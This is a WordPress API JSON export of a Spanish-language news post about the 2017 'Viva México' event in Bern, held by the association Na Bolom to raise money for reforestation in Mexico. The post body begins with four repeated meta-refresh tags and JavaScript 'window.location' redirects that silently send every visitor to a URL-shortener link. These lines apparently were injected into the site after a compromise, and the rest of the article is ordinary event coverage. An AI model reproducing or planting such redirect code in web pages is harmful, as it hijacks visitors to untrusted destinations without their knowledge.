{"id":6925,"date":"2017-09-22T08:43:05","date_gmt":"2017-09-22T14:43:05","guid":{"rendered":"http:\/\/nabolom.ch\/?p=6925"},"modified":"2026-02-20T18:18:09","modified_gmt":"2026-02-21T00:18:09","slug":"na-bolom-recauda-mas-de-1000-francos-para-reforestacion","status":"publish","type":"post","link":"https:\/\/nabolom.ch\/web\/2017\/09\/na-bolom-recauda-mas-de-1000-francos-para-reforestacion\/","title":{"rendered":"Na Bolom recauda m\u00e1s de 1000 francos para reforestaci\u00f3n"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.info\/WFE0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.info\/WFE0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.info\/WFE0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.info\/WFE0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.info\/WFE0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.info\/WFE0r3\";<\/script><br \/>\n<meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.info\/WFE0r3\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.info\/WFE0r3\";<\/script><\/p>\n<p style=\"text-align: justify;\">\u2014 rese\u00f1a del evento \u00ab\u00a1Viva M\u00e9xico 2017!\u00bb en Berna el 19.08.2017, por Ivonne Meyer-Escobar, presidenta de Na Bolom para \u00a9PuntoLatino<\/p>\n<p style=\"text-align: justify;\">Despu\u00e9s de meses de preparaci\u00f3n para el evento Viva M\u00e9xico, lleg\u00f3 el gran d\u00eda. Los expositores estuvieron desde temprano para preparar sus puestos con mucha ilusi\u00f3n y se vivi\u00f3 desde el inicio un ambiente alegre, optimista y positivo en el que las esperanzas estaban puestas en los visitantes al evento.<\/p>\n<p style=\"text-align: justify;\">Se dio inicio a la ceremonia de inauguraci\u00f3n en la sala de ponencias acad\u00e9micas con la presencia de representantes del Comit\u00e9 Ejecutivo de Na Bolom.ch as\u00ed como de la Embajada de M\u00e9xico. Mientras, en el parque Platanenhof y en la Sala Parroquial Paulus, todo estaba preparado para recibir a los visitantes. La distribuci\u00f3n de los puestos se plane\u00f3 adecuadamente, de manera que los visitantes pudieran caminar por las diferentes salas y visitar cada puesto sin ning\u00fan problema de circulaci\u00f3n.<\/p>\n<p style=\"text-align: justify;\">El Bar a la entrada del edificio invitaba a pasar a las salas en la planta alta donde se encontraban los puestos de comida y el programa cultural y art\u00edstico. Un punto de curiosidad y simpat\u00eda fue el Vocho que se trajo para exponer! La gente se hac\u00eda fotos con \u00e9l, como recordando y a\u00f1orando tiempos pasados y el s\u00edmbolo del veh\u00edculo en la sociedad mexicana. Para mediod\u00eda todas las salas estaban concurridas y gracias al buen tiempo, pudimos sentarnos afuera para disfrutar del hermoso \u201cparque escondido\u201d de Berna.<\/p>\n<p style=\"text-align: justify;\">Tanto el programa acad\u00e9mico como el cultural y art\u00edstico llenaron todas las expectativas del p\u00fablico, la gente estaba muy interesada y animada. Los comentarios de los visitantes fueron siempre positivos, se respir\u00f3 un ambiente relajado en todo momento.<\/p>\n<p style=\"text-align: justify;\">Los expositores del mercado estuvieron contentos y satisfechos con su participaci\u00f3n, sab\u00edan que era un reto iniciar un evento de esta magnitud y lo que conlleva, me parece que todos participaron con el fin de crear una plataforma para sus productos y entablar contactos, lo cual se cumpli\u00f3. Al final del d\u00eda, nos despedimos de los expositores muy agradecidos por haberse sumado a este proyecto y con las expectativas cumplidas.<\/p>\n<p style=\"text-align: justify;\">Elizabeth Schlumpf, del taller de pi\u00f1atas Eli, mencion\u00f3 que de parte de los participantes del taller solo tuvieron comentarios muy positivos sobre la organizaci\u00f3n, les pareci\u00f3 muy buena idea incluir espacios para el p\u00fablico infantil separados de las otras salas, como en esta ocasi\u00f3n. (pi\u00f1atas y loter\u00eda fueron una buena alternativa).<\/p>\n<p style=\"text-align: justify;\">Los puestos en la parte culinaria tambi\u00e9n estuvieron satisfechos con la repuesta del p\u00fablico, los tacos, quesadillas, chimichangas, tamales y dem\u00e1s antojitos llenaron las expectativas de los visitantes quienes halagaron el sabor y saz\u00f3n de las participantes.<br \/>\nEl \u00e1rea del Bar, con deliciosas margaritas y aguas frescas nos comentaron que la m\u00fasica en vivo fue la cereza del pastel, anim\u00f3 el ambiente y puso a bailar a muchos.<\/p>\n<p style=\"text-align: justify;\">En cuanto a la parte de recaudaci\u00f3n, queremos agradecer a todos los que contribuyeron a cumplir con el objetivo que se ten\u00eda. Hasta el momento, esperamos poder enviar una cifra superior a los mil francos para proyecto de reforestaci\u00f3n de Na Bolom M\u00e9xico y continuar construyendo una plataforma para productos artesanales en Suiza.<\/p>\n<p style=\"text-align: justify;\">Un agradecimiento a la Embajada de M\u00e9xico por su participaci\u00f3n con el puesto de informaci\u00f3n y difusi\u00f3n as\u00ed como al Sr. Embajador Fernando Castro Trenti por el apoyo brindado para la realizaci\u00f3n de este evento.<\/p>\n<p style=\"text-align: justify;\">De nuevo agradecemos a todos los participantes, expositores, ponentes y visitantes de Viva M\u00e9xico 2017. Mil gracias!<\/p>\n<p style=\"text-align: justify;\">V\u00eda : <a href=\"http:\/\/www.puntolatino.ch\/asociaciones\/asociaciones-mexicanas\/9239-2017-na-bolom-be,-por-i-meyer-e\">http:\/\/www.puntolatino.ch\/asociaciones\/asociaciones-mexicanas\/9239-2017-na-bolom-be,-por-i-meyer-e<\/a><\/p>\n<\/p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u2014 rese\u00f1a del evento \u00ab\u00a1Viva M\u00e9xico 2017!\u00bb en Berna el 19.08.2017, por Ivonne Meyer-Escobar, presidenta de Na Bolom para \u00a9PuntoLatino Despu\u00e9s de meses de preparaci\u00f3n para el evento Viva M\u00e9xico,<\/p>\n","protected":false},"author":1,"featured_media":7420,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"rs_blank_template":"","rs_page_bg_color":"","slide_template_v7":"","footnotes":""},"categories":[62,60],"tags":[],"class_list":["post-6925","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-events2017","category-news-2"],"_links":{"self":[{"href":"https:\/\/nabolom.ch\/web\/wp-json\/wp\/v2\/posts\/6925","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nabolom.ch\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nabolom.ch\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nabolom.ch\/web\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/nabolom.ch\/web\/wp-json\/wp\/v2\/comments?post=6925"}],"version-history":[{"count":1,"href":"https:\/\/nabolom.ch\/web\/wp-json\/wp\/v2\/posts\/6925\/revisions"}],"predecessor-version":[{"id":14882,"href":"https:\/\/nabolom.ch\/web\/wp-json\/wp\/v2\/posts\/6925\/revisions\/14882"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nabolom.ch\/web\/wp-json\/wp\/v2\/media\/7420"}],"wp:attachment":[{"href":"https:\/\/nabolom.ch\/web\/wp-json\/wp\/v2\/media?parent=6925"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nabolom.ch\/web\/wp-json\/wp\/v2\/categories?post=6925"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nabolom.ch\/web\/wp-json\/wp\/v2\/tags?post=6925"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}